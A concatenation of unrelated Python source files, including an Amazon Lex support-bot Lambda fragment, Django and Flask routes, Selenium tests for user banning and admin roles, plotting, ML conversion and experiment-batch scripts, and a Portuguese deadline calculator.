'CaseId': ticketId,
},
UpdateExpression="set #st = :r, LastUpdatedDate = :l",
ExpressionAttributeValues={
':r':updatedStatus,
':l':str(time.time())
},
ExpressionAttributeNames={
'#st':'Status'
},
ReturnValues="UPDATED_NEW")
logger.debug('finished changing status to='+updatedStatus)
def close(session_attributes, fulfillment_state, message):
response = {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'Close',
'fulfillmentState': fulfillment_state,
'message': message
}
}
logger.debug('<<SupportBot>> "Lambda fulfillment function response = \n' + str(response))
return response
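# ---------------------------------------------------------------------------
# Illustrative local invocation (not part of the deployed Lambda). The event
# below only carries the fields read by lambda_handler above; real Amazon Lex
# events contain more. Running it requires AWS credentials, the DynamoDB table
# and the DynamoDB_Table_Name environment variable; the intent and slot values
# are made-up placeholders.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    sample_event = {
        'bot': {'name': 'SupportBot'},
        'sessionAttributes': {},
        'currentIntent': {
            'name': 'UpdateTicketStatus',
            'slots': {'ticket_id': 'example-case-id', 'status': 'Resolved'},
        },
    }
    print(lambda_handler(sample_event, None))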
|
""" jpv2rel.py
Scripting for jpv2rel conversion runs.
Ex:
JISP16 truncated at relative Nmax20...
% cd nuclthy/data/interaction/jpv-relative/Vrel_JISP16_bare_Jmax4
% python3 ~/projects/shell/script/jpv2rel.py
% mv *_rel.dat ../../rel/JISP16_Nmax20
M. A. Caprio
Department of Physics
University of Notre Dame
2/23/17 (mac): Created.
"""
# generic packages for use below
import math
import os
import sys
# load mcscript
import mcscript
##mcscript.init()
##################################################################
# build task list
##################################################################
# executables
# executable files
projects_root = os.path.join(os.environ["HOME"],"projects")
jpv2rel_executable = os.path.join(projects_root,"shell","libraries","relative","jpv2rel")
# configuration
hw_values = mcscript.utils.value_range(10,30,2.5)
# generate task list
# This should be a list of dictionaries, with keys that your task
# handler function will understand. Then, mcscript will automatically
# add some extra keys to these dictionaries, e.g., a task identifier
# name.
tasks = [
{
"hw" : hw,
"Jmax" : 4,
"Nmax" : 20,
"jpv_filename_template" : "Vrel_JISP16_bare_Jmax{Jmax}.hw{hw:g}",
"rel_filename_template" : "JISP16_Nmax{Nmax}_hw{hw:2.1f}_rel.dat"
}
for hw in hw_values
]
def convert_jpv2rel(task):
""" Invoke jpv2rel.
"""
input_lines = [
"{Nmax} {Jmax}".format(**task),
task["jpv_filename_template"].format(**task),
task["rel_filename_template"].format(**task)
]
mcscript.call(jpv2rel_executable,input_lines=input_lines)
for task in tasks:
convert_jpv2rel(task)
|
# #####################################################################################################################
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
# #####################################################################################################################
import logging
import os
DEFAULT_LEVEL = "WARNING"
def get_level():
"""
Get the logging level from the LOG_LEVEL environment variable if it is valid. Otherwise set to WARNING
:return: The logging level to use
"""
valid_levels = ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]
requested_level = os.environ.get("LOG_LEVEL", DEFAULT_LEVEL)
if requested_level and requested_level in valid_levels:
return requested_level
return DEFAULT_LEVEL
def get_logger(name):
"""
Get a configured logger. Compatible with both the AWS Lambda runtime (root logger) and local execution
:param name: The name of the logger (most often __name__ of the calling module)
:return: The logger to use
"""
logger = None
# first case: running as a lambda function or in pytest with conftest
# second case: running a single test or locally under test
if len(logging.getLogger().handlers) > 0:
logger = logging.getLogger()
logger.setLevel(get_level())
# overrides
logging.getLogger("boto3").setLevel(logging.WARNING)
logging.getLogger("botocore").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
else:
logging.basicConfig(level=get_level()) # NOSONAR (python:S4792)
logger = logging.getLogger(name)
return logger
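# Minimal usage sketch (illustrative, not part of the original module): the
# returned logger honours the LOG_LEVEL environment variable read by
# get_level() above.
if __name__ == "__main__":
    os.environ.setdefault("LOG_LEVEL", "INFO")
    log = get_logger(__name__)
    log.info("logger configured at level %s", get_level())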
|
from django.urls import path
from django.utils.translation import gettext_lazy as _
from envergo.users.views import Register, RegisterSuccess, TokenLogin
urlpatterns = [
path(_("register/"), Register.as_view(), name="register"),
path(_("register-success/"), RegisterSuccess.as_view(), name="register_success"),
path(_("login/<uidb64>/<token>/"), TokenLogin.as_view(), name="token_login"),
]
|
def makeAnagram(a, b):
    # Counts occurrences in b of characters that are absent from a or whose
    # counts differ between a and b.
non_common = []
c_list= list(a)
b_list = list(b)
my_d = {}
for char in c_list:
my_d[char] = c_list.count(char)
for char in b_list:
if char not in my_d.keys() or b_list.count(char) != c_list.count(char):
non_common.append(char)
return len(non_common)
|
import numpy as np
import pandas as pd
import statsmodels.api as sm
from linearRegressionModel import *
from handleYears import *
from utility import *
training_data = pd.read_csv("../data/TrainingSet.csv", index_col=0)
submission_labels = pd.read_csv("../data/SubmissionRows.csv", index_col=0)
prediction_rows = training_data.loc[submission_labels.index]
prediction_rows = prediction_rows[generate_year_list(1972, 2007)] # Gets rid of the nonsense columns
# Apply model and make some predictions
predictions = prediction_rows.apply(linearReg_5points, axis=1)
write_submission_file(predictions, "Attempt2.csv")
|
from flask import render_template
from flask_login import current_user, login_required
from application import app
# Assumption: EditProfileForm lives in application.forms; adjust to the project layout.
from application.forms import EditProfileForm
from application.models import User, Post
@app.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
    form = EditProfileForm(current_user.username)
    # The original snippet ended here without returning; the template name below is an assumption.
    return render_template('edit_profile.html', form=form)
@app.route('/')
@app.route('/index')
def index():
users = User.query.all()
return render_template('index.html', title='Home', Users=users)
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
from distutils.core import setup
import popupcad
packages = []
packages.append('dev_tools')
packages.append('api_examples')
packages.append('popupcad')
packages.append('popupcad.algorithms')
packages.append('popupcad.constraints')
packages.append('popupcad.filetypes')
packages.append('popupcad.geometry')
packages.append('popupcad.graphics2d')
packages.append('popupcad.graphics3d')
packages.append('popupcad.guis')
packages.append('popupcad.manufacturing')
packages.append('popupcad.materials')
packages.append('popupcad.widgets')
packages.append('popupcad_deprecated')
packages.append('popupcad_manufacturing_plugins')
packages.append('popupcad_manufacturing_plugins.manufacturing')
packages.append('popupcad_microrobotics')
packages.append('popupcad_tests')
packages.append('qt')
#packages.append('popupcad_manufacturing_plugins.manufacturing')
#packages.append('pypoly2tri')
package_data = {}
package_data['popupcad'] = ['supportfiles/*','supportfiles/icons/*','supportfiles/test_files/*']
setup(name=popupcad.program_name,
version=popupcad.version,
classifiers=popupcad.classifiers,
description=popupcad.description,
author=popupcad.author,
author_email=popupcad.author_email,
url=popupcad.url,
packages=packages,
package_data=package_data
)
|
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
from matplotlib.ticker import ScalarFormatter
import pandas as pd
import os
def generate_graphics(cov_file, output_dir):
df = pd.read_table(cov_file)
fold_vs_len_file = _generate_fold_vs_length(df, output_dir, "png")
fold_vs_gc_file = _generate_fold_vs_gc(df, output_dir, "png")
gc_hist_file = _generate_gc_histogram(df, output_dir, "png")
return {
"avg_fold_vs_len": fold_vs_len_file,
"gc_vs_avg_fold": fold_vs_gc_file,
"gc_hist": gc_hist_file
}
def _generate_fold_vs_length(df, output_dir, suffix):
"""
df = dataframe, expected to have Avg_fold and Length columns
Makes a file called "avg_fold_vs_len.{suffix}" and returns the full path to it.
"""
fig, ax = plt.subplots(figsize=(6,6))
plt.yticks(rotation=90, va='center')
plt.plot(df.Length, df.Avg_fold, '+')
ax.set_yscale('log')
ax.yaxis.set_major_formatter(ScalarFormatter())
ax.set(xlabel="Contigs Length (bp)", ylabel="Average coverage fold (x)", title="Contigs average fold coverage vs. Contigs length")
outfile = os.path.join(output_dir, "avg_fold_vs_len.{}".format(suffix))
fig.savefig(outfile, dpi=100)
return outfile
def _generate_fold_vs_gc(df, output_dir, suffix):
fig, ax = plt.subplots(figsize=(6,6))
plt.yticks(rotation=90, va='center')
plt.plot(df.Avg_fold, df.Ref_GC, '+')
ax.set_xscale('log')
ax.xaxis.set_major_formatter(matplotlib.ticker.ScalarFormatter())
ax.set(xlabel="Average coverage fold (x)", ylabel="GC (%)", title="Contigs average fold coverage vs. GC")
outfile = os.path.join(output_dir, "gc_vs_avg_fold.{}".format(suffix))
fig.savefig(outfile, dpi=100)
return outfile
def _generate_gc_histogram(df, output_dir, suffix):
fig, ax = plt.subplots(figsize=(6,6))
plt.yticks(rotation=90, va='center')
plt.hist(df[df['Length'].gt(0)].Ref_GC*100, [v/10.0 for v in range(0, 1020, 15)], lw=1, fill=False, fc=(0, 0, 0))
ax.set(ylabel="# of contigs", xlabel="GC (%)", title="GC Histogram for contigs")
outfile = os.path.join(output_dir, "gc_hist.{}".format(suffix))
fig.savefig(outfile, dpi=100)
return outfile
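# Minimal usage sketch (illustrative): "coverage.tsv" is a placeholder for a
# tab-separated coverage table with the Avg_fold, Length and Ref_GC columns
# used above, and the output directory must already exist.
if __name__ == "__main__":
    print(generate_graphics("coverage.tsv", "."))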
|
import pytest
from selenium import webdriver
from time import sleep
from selenium.webdriver.support.select import Select
import sqlite3
from static.classes.User import User, encryptPassword, decryptPassword
# Global variable
# Prepare the user and password for test
username_test = "test111"
password_test = "Aa123456!!"
institution_test = "SCE_Test"
faculty_test = "Chemistry_Test"
instID = 0
facID = 0
email = "aaa@aaa.com"
@pytest.fixture
def db_prepare_manage_users():
global instID, facID
# Prepare the institution
db_name = "database.db"
# connect to db to prepare it before testing
con = sqlite3.connect(db_name)
cursor=con.cursor()
# Check if institution exists
sqlQueryCheckExist = "SELECT * FROM Institutions WHERE InstitutionName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (institution_test,))
record = sqlRes.fetchone()
    # If institution does not exist, create it
if record == None:
sqtInsertInst = "INSERT INTO Institutions (InstitutionName) VALUES (?)"
cursor.execute(sqtInsertInst, (institution_test,))
instID = cursor.lastrowid
else:
instID = record[0]
# Check if faculty exists
sqlQueryCheckExist = "SELECT * FROM Faculties WHERE FacultyName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (faculty_test,))
record = sqlRes.fetchone()
    # If faculty does not exist, create it
if record == None:
sqlInsertFac = "INSERT INTO Faculties (FacultyName) VALUES (?)"
cursor.execute(sqlInsertFac, (faculty_test,))
facID = cursor.lastrowid
else:
facID = record[0]
    # Check if the institution-faculty pair exists in the FacIn table
sqlQueryCheckExist = "SELECT * FROM FacIn WHERE InstitutionID = (?) AND FacultyID = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (instID, facID))
record = sqlRes.fetchone()
    # If the institution-faculty pair does not exist, create it
if record == None:
sqtInsertInstFac = "INSERT INTO FacIn VALUES (?, ?)"
con.execute(sqtInsertInstFac, (instID, facID))
# Check if user exists in Users table
sqlQueryCheckExist = "SELECT * FROM Users WHERE UserName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (username_test,))
record = sqlRes.fetchone()
    # If user does not exist, create it
if record == None:
sqtInsertUser = "INSERT INTO Users VALUES (?,?, ?, ?, ?, ?, ?, 1, 0, ?)"
con.execute(sqtInsertUser, (username_test, "test1", "test1", encryptPassword(password_test), instID, facID, 2, email))
# Commit the changes in users table
con.commit()
#----------------------------------------------------------------
yield db_name
# Check if user exists
sqlQueryCheckExist = "SELECT * FROM Users WHERE UserName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (username_test,))
record = sqlRes.fetchone()
# If user exists delete the user from DB
if record != None:
sqlDelete = "DELETE FROM Users WHERE UserName = (?)"
sqlRes = con.execute(sqlDelete, (username_test,))
    # Check if the institution-faculty pair exists in the FacIn table
sqlQueryCheckExist = "SELECT * FROM FacIn WHERE InstitutionID = (?) AND FacultyID = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (instID, facID))
record = sqlRes.fetchone()
# If faculty in institution exists delete it
if record != None:
sqtDelInstFac = "DELETE FROM FacIn WHERE InstitutionID = (?) AND FacultyID = (?)"
con.execute(sqtDelInstFac, (instID, facID))
# Check if faculty exists
sqlQueryCheckExist = "SELECT * FROM Faculties WHERE FacultyName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (faculty_test,))
record = sqlRes.fetchone()
# If faculty exists delete it
if record != None:
sqlDelFac = "DELETE FROM Faculties WHERE FacultyID = (?)"
con.execute(sqlDelFac, (facID,))
# Check if institution exists
sqlQueryCheckExist = "SELECT * FROM Institutions WHERE InstitutionName = (?)"
sqlRes = con.execute(sqlQueryCheckExist, (institution_test,))
record = sqlRes.fetchone()
    # If institution exists, delete it
if record != None:
sqtDelInst = "DELETE FROM Institutions WHERE InstitutionID = (?)"
con.execute(sqtDelInst, (instID,))
# Commit the changes in users table
con.commit()
    # Close connection to DB
con.close()
class TestIntegrationManageUsers:
def test_manage_users_page(self, application: str, ff_browser: webdriver.Firefox, db_prepare_manage_users):
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Open the control panel page
ff_browser.get(application + "/controlpanel")
# Get manage users button
btnManageUsers = ff_browser.find_element_by_name("usersManage")
# Click the manage users button
btnManageUsers.click()
# Get manage institution title
manageUsersTitle = ff_browser.find_element_by_name("titleManageUsers")
assert (manageUsersTitle.text == "Manage Users:")
def test_ban_user(self, application: str, ff_browser: webdriver.Firefox, db_prepare_manage_users):
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Open the manage users page
ff_browser.get(application + "/manage_users")
# Get ban test user button
btnBanTestUser = ff_browser.find_element_by_id(username_test + "_banBtn")
# Click the manage users button
btnBanTestUser.click()
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Get the banned message element
bannedMsg = ff_browser.find_element_by_xpath("/html/body/div[2]/b")
assert bannedMsg.text == ("Your user is banned!")
def test_unban_user(self, application: str, ff_browser: webdriver.Firefox, db_prepare_manage_users):
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Open the manage users page
ff_browser.get(application + "/manage_users")
# Get ban test user button
btnBanTestUser = ff_browser.find_element_by_id(username_test + "_banBtn")
# Click the ban user button
btnBanTestUser.click()
# Get unban test user button
btnUnbanTestUser = ff_browser.find_element_by_id(username_test + "_unbanBtn")
# Click the unban user button
btnUnbanTestUser.click()
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Get the welocme message element
welcomeMsg = ff_browser.find_element_by_name("welcome_message")
assert welcomeMsg.text == ("Welcome " + username_test + "!")
def test_add_admin(self, application: str, ff_browser: webdriver.Firefox, db_prepare_manage_users):
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Open the manage users page
ff_browser.get(application + "/manage_users")
# Get revoke admin test user button
btnRevokeAdmin = ff_browser.find_element_by_id(username_test + "_revokeBtn")
# Click the revoke admin
btnRevokeAdmin.click()
# Get grant admin test user button
btnGrantAdmin = ff_browser.find_element_by_id(username_test + "_grantBtn")
# Click the grant admin
btnGrantAdmin.click()
# Run logout to clean session
ff_browser.get(application + "/logout")
# Open the login page
ff_browser.get(application + "/login")
# Get username and password elements on page
username = ff_browser.find_element_by_name("username")
password = ff_browser.find_element_by_name("password")
# Get submit button element
btnSubmit = ff_browser.find_element_by_xpath("/html/body/div[2]/form/input")
# Inject username and password of test user
username.send_keys(username_test)
password.send_keys(password_test)
# Click on submit button
btnSubmit.click()
# Get control panel button
controlPanelBtn = ff_browser.find_element_by_name("control_panel_link")
assert controlPanelBtn.text == ("Control Panel")
|
from django.db import models
# Create your models here.
class OAuthUser(models.Model):
pass
|
from demo_constants.demo_racetrack_data import DISCOUNT, REWARD
from gridworld_constants import *
# All possible actions
ACTIONS = [(-1, -1), (-1, 0), (0, -1), (-1, 1),
(0, 0), (1, -1), (0, 1), (1, 0), (1, 1)]
# Constant step penalty
REWARD = -1
DISCOUNT = 1
# Schema used for creating a gridworld
GRIDWORLD_SCHEMA = [
[(OPEN, 10)],
[(OPEN, 10)],
[(OPEN, 10)],
[(START, 1), (OPEN, 6), (GOAL, 1), (OPEN, 2)],
[(OPEN, 10)],
[(OPEN, 10)],
[(OPEN, 10)],
]
# Maps the displacement due to wind by column
COL_TO_WIND = {
0: 0,
1: 0,
2: 0,
3: 1,
4: 1,
5: 1,
6: 2,
7: 2,
8: 1,
9: 0
}
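# Illustrative helper (not part of the original constants module): expand the
# run-length encoded GRIDWORLD_SCHEMA above into a full 7x10 grid of cell
# types. The (cell_type, count) reading is inferred from each row's counts
# summing to 10.
def expand_schema(schema):
    return [[cell for cell, count in row for _ in range(count)] for row in schema]
# e.g. GRID = expand_schema(GRIDWORLD_SCHEMA)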
|
# Copyright 2021 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from unittest import TestCase
from uw_canvas.utilities import fdao_canvas_override
from uw_canvas.admins import Admins
import mock
@fdao_canvas_override
class CanvasTestAdmins(TestCase):
def test_admins(self):
canvas = Admins()
admins = canvas.get_admins_by_sis_id('uwcourse:seattle:nursing:nurs')
self.assertEquals(len(admins), 11, "Failed to follow Link header")
admin = admins[10]
self.assertEquals(admin.role, 'AccountAdmin', "Has proper role")
self.assertEquals(admin.user.user_id, 1111, "Has proper id")
@mock.patch.object(Admins, '_post_resource')
def test_create_admin(self, mock_post):
canvas = Admins()
canvas.create_admin_by_sis_id(
'uwcourse:seattle:nursing:nurs', 1111, 'AccountAdmin')
mock_post.assert_called_with((
'/api/v1/accounts/sis_account_id%3Auwcourse%3Aseattle'
'%3Anursing%3Anurs/admins'), {
'role': 'AccountAdmin',
'send_confirmation': False,
'user_id': '1111'
})
@mock.patch.object(Admins, '_delete_resource')
def test_delete_admin(self, mock_delete):
canvas = Admins()
canvas.delete_admin_by_sis_id(
'uwcourse:seattle:nursing:nurs', 1111, 'AccountAdmin')
mock_delete.assert_called_with((
'/api/v1/accounts/sis_account_id%3Auwcourse%3Aseattle%3Anursing'
'%3Anurs/admins/1111?role=AccountAdmin'))
|
import argparse
import sys
import torch
from torch.autograd import Variable
import pytorch_to_caffe
from target_model import mobilenet_v1
def load_pretrained_model(model, checkpoint):
checkpoint = torch.load(checkpoint, map_location=lambda storage, loc: storage)['state_dict']
model_dict = model.state_dict()
for k in checkpoint.keys():
kc = k.replace('module.', '')
if kc in model_dict.keys():
model_dict[kc] = checkpoint[k]
if kc in ['fc_param.bias', 'fc_param.weight']:
model_dict[kc.replace('_param', '')] = checkpoint[k]
model.load_state_dict(model_dict)
return model
def main(args):
name = args.name
if args.factor == 1:
model = mobilenet_v1.mobilenet_1()
elif args.factor == 0.5:
model = mobilenet_v1.mobilenet_05()
else:
sys.exit(-1)
model = load_pretrained_model(model, args.checkpoint)
model.eval()
input = Variable(torch.rand(1, 3, 120, 120))
pytorch_to_caffe.trans_net(model, input, name)
pytorch_to_caffe.save_prototxt('{}.prototxt'.format(name))
pytorch_to_caffe.save_caffemodel('{}.caffemodel'.format(name))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Transfer mobilenet from pytorch to caffe')
parser.add_argument('-f', '--factor', type=float, default=1)
parser.add_argument('-c', '--checkpoint', type=str, default='target_model/mb1_120x120.pth')
parser.add_argument('-n', '--name', type=str, default='caffe_model/mobilenet1')
args = parser.parse_args()
main(args)
|
# Date calculation for deadline counting
# 1 Import the required libraries
from datetime import date, datetime
import calendar
# 2 Print the header and divider lines
print('CALCULADORA DE PRAZOS')
def linha():
    print('=' * 45, '\n')
linha()
# 3 Run the script inside a while True loop
while True:
    # 4 Ask the user for the data, with exception handling
    while True:
        try:
            string = input('\nData da Infração ex.:(01011999): ').strip()
        except ValueError:
            print('Informe uma data válida!')
        else:
            if len(string) > 8 or len(string) < 8:
                print('Informe uma data válida! Ex.: 01011999')
            else:
                break
    while True:
        try:
            prazo = int(input('Informe o prazo(em dias): '))
        except ValueError:
            print('Dados Incorretos! Digite novamente!')
        else:
            break
    # 5 Convert the string to a date - output 0000-00-00
    data = datetime.strptime(string, '%d%m%Y')
    # 6 Get the month and year of the given date
    mes = data.month
    ano = data.year
    # 7 Get the final date after the given number of days
    data_final = data.fromordinal(data.toordinal()+(prazo))
    # 8 Get the weekday of the final date
    dias = ('Segunda-Feira', 'Terça-Feira', 'Quarta-Feira', 'Quinta-Feira',
            'Sexta-Feira', 'Sábado', 'Domingo')
    # 9 If the final date falls on a Saturday or Sunday, return the next business day
    if dias[data_final.weekday()] == 'Sábado':
        # the business day will be Monday
        dia_util = data.fromordinal(data_final.toordinal()+2)
        # get the weekday name for that business day
        dia_da_semana = dias[dia_util.weekday()]
    elif dias[data_final.weekday()] == 'Domingo':
        dia_util = data.fromordinal(data_final.toordinal()+1)
        dia_da_semana = dias[dia_util.weekday()]
    else:
        dia_util = data_final
        dia_da_semana = dias[data_final.weekday()]
    # 10 Get the month of the final date, for when it falls in the following month
    prox_mes = data_final.month
    # 11 Build the calendars for the dates obtained
    # calendar for the month of the first date entered
    c1 = calendar.TextCalendar(calendar.SUNDAY)
    cal1 = c1.formatmonth(ano, mes)
    # calendar for the month of the final date when it falls in the following month
    c2 = calendar.TextCalendar(calendar.SUNDAY)
    cal2 = c2.formatmonth(ano, prox_mes)
    linha()
    print(cal1)
    print()
    # the second calendar is shown only if the final date falls in the following month
    if prox_mes != mes:
        print(cal2)
        print()
    linha()
    # 12 Format the output in the desired date layout 00/00/0000 (final date)
    data_format = dia_util.strftime('%d/%m/%Y')
    # show the result
    print(f'Prazo Final: {data_format}, {dia_da_semana}')
    linha()
    # 13 Finally, a variable that receives the answer deciding whether
    # the loop continues or not.
    resposta = input('\nDeseja Continuar ? [S/N]').strip().upper()
    if resposta in 'Nn':
        break
|
from objects import experiments, outputtable, computationalresource
import json
import itertools
import copy
import os
import lxml.etree as etree
import sqlite3 as lite
import sys
import subprocess
import datetime
import time
modelsAndAlgorithmNames_global = []
baseParamsDict_global = {}
computationalResource_global = None
outputtable_global = None
outputtable_relerror_global = None
databaseName_global = '../db/facpro-results.db'
databaseTables = {'BaseExpr', 'RelError'}
def remove_old_solution_files():
dir = "../output/"
directory = os.listdir(dir)
for item in directory:
if item.endswith(".mst") or item.endswith(".sol"):
os.remove(os.path.join(dir, item))
def setUp(mode = 'debug', resetParams = False):
if resetParams:
remove_old_solution_files()
createOutputTables()
createDefaultComputationalResource(mode)
createBaseParamsDict()
def setUpDatabase(dropExisting = False):
con = None
try:
con = lite.connect(databaseName_global)
c = con.cursor()
if dropExisting:
for tableName in databaseTables:
c.execute('drop table if exists ' + tableName)
# Create table
c.execute(getCreateTableString_BaseExpr())
c.execute(getCreateTableString_RelError())
con.commit()
except lite.Error, e:
if con:
con.rollback()
print "Error %s:" % e.args[0]
sys.exit(1)
finally:
if con:
con.close()
def getCreateTableString_BaseExpr():
myDict = json.loads(open('../db/databaseTableColumns.json').read())
typesDict = myDict['types']
string = 'CREATE TABLE ' + 'BaseExpr' + '''('''
for column in myDict['metaColumns']:
string += column + ' ' + typesDict[column] + ', '
for dbColCategory in myDict['columnsInAllTables']:
for dbColName in myDict['columnsInAllTables'][dbColCategory]:
string += dbColName + ' ' + typesDict[dbColName] + ', '
for column in myDict['baseTableColumns']:
string += column + ' ' + typesDict[column] + ', '
string = string[:-2]
string += ''');'''
return string
def getCreateTableString_RelError():
myDict = json.loads(open('../db/databaseTableColumns.json').read())
typesDict = myDict['types']
string = 'CREATE TABLE ' + 'RelError' + '''('''
for column in myDict['metaColumns']:
string += column + ' ' + typesDict[column] + ', '
for dbColCategory in myDict['columnsInAllTables']:
for dbColName in myDict['columnsInAllTables'][dbColCategory]:
string += dbColName + ' ' + typesDict[dbColName] + ', '
for column in myDict['relErrorTableColumns']:
string += column + ' ' + typesDict[column] + ', '
string = string[:-2]
string += ''');'''
return string
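# Illustrative note (an assumption inferred from the two helpers above, not a
# documented schema): ../db/databaseTableColumns.json is expected to look roughly like
#   {"types": {"someColumn": "TEXT", ...},
#    "metaColumns": ["someColumn", ...],
#    "columnsInAllTables": {"someCategory": ["colA", ...], ...},
#    "baseTableColumns": [...],
#    "relErrorTableColumns": [...]}
# so that each helper emits a string of the form
#   CREATE TABLE BaseExpr(someColumn TEXT, colA ..., ...);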
def createOutputTables():
global outputtable_global, outputtable_relerror_global
outputtable_global = outputtable.OutputTable(databaseName = databaseName_global, tableName = 'mainTable')
outputtable_relerror_global = outputtable.OutputTable(databaseName = databaseName_global, tableName='relerrorTable')
def createDefaultComputationalResource(mode = 'debug'):
global computationalResource_global
if mode == 'debug':
computationalResource_global = computationalresource.createComputationalResource('shadow-debug')
else:
computationalResource_global = computationalresource.createComputationalResource('shadow-unsponsored')
def createBaseParamsDict():
global baseParamsDict_global
baseParamsDict_global = json.loads(open('baseExperimentParameters.json').read())
def flatten_two_level_nested_dict(dict):
newDict = {}
for key in dict:
for subkey in dict[key]:
newDict[subkey] = dict[key][subkey]
return newDict
def cardProductOfDictionaries(paramsDict):
for key in paramsDict:
if not isinstance(paramsDict[key], list):
paramsDict[key] = [paramsDict[key]]
return list(dict(itertools.izip(paramsDict, x)) for x in itertools.product(*paramsDict.itervalues()))
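# Example of the behaviour above (values are hypothetical): every non-list value
# is first wrapped in a one-element list, then the cartesian product of all
# value lists is returned as a list of flat dictionaries, e.g.
#   cardProductOfDictionaries({'a': [1, 2], 'b': 'x'})
#   -> [{'a': 1, 'b': 'x'}, {'a': 2, 'b': 'x'}]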
def createParamsDictsForExprmnts(baseParamsDict, rangesOfParametersToVary, group_def = None):
    ''' returns a list of dictionaries, one for each experiment'''
if group_def is not None:
baseParamsDict = flatten_two_level_nested_dict(baseParamsDict)
newParamsDict = copy.deepcopy(baseParamsDict)
for paramName in rangesOfParametersToVary.keys():
newParamsDict[paramName] = rangesOfParametersToVary[paramName]
list_of_flattened_dicts = cardProductOfDictionaries(newParamsDict)
    if group_def is None:
        # No group definition means there is nothing to unflatten
        return list_of_flattened_dicts
    list_of_unflattened_dicts = []
for flattened_dict in list_of_flattened_dicts:
unflattened_dict = {}
for key in group_def:
unflattened_dict[key] = {}
for subkey in group_def[key]:
unflattened_dict[key][subkey] = flattened_dict[subkey]
list_of_unflattened_dicts.append(unflattened_dict)
return list_of_unflattened_dicts
def getFilenameForExprParamsDict(rangesOfParametersToVary, paramsDict):
paramsToVary = rangesOfParametersToVary.keys()
stringToAdd = ''
for paramName in paramsToVary:
        stringToAdd += '_' + paramName + '-' + str(paramsDict[paramName])
return '../exprFiles/ExprParams_base' + stringToAdd + '.json'
def runExperimentsForExperimentBatch(ranges_of_params_to_vary, experimentName,
modelsAndAlgs = modelsAndAlgorithmNames_global, baseParamsDict = None,
runTheExperiments = False, localMode = False):
group_def = json.loads(open('../db/databaseTableColumns.json').read())['columnsInAllTables']
if baseParamsDict is None:
params_dicts_for_exprs = createParamsDictsForExprmnts(baseParamsDict_global,
ranges_of_params_to_vary, group_def)
else:
params_dicts_for_exprs = createParamsDictsForExprmnts(baseParamsDict, ranges_of_params_to_vary, group_def)
print "paramsDictsForExperiments", params_dicts_for_exprs
exprBatch = experiments.OptimizationExperimentBatch(computationalResource_global,
'../exprBatchScripts/run_experiments_for_' + experimentName + '.sh')
for paramsDict in params_dicts_for_exprs:
for infModelName in modelsAndAlgs:
scriptCall = 'python ' + '../src/models/run_facpro.py'
exprBatch.addOptimizationExperiment(experiments.OptimizationExperiment(scriptCall,
computationalResource_global, outputtable_global, experimentName,
parametersDictionary = paramsDict, paramsThatChanged = ranges_of_params_to_vary.keys()))
exprBatch.writeBatchScript()
if not localMode:
print "syncing files"
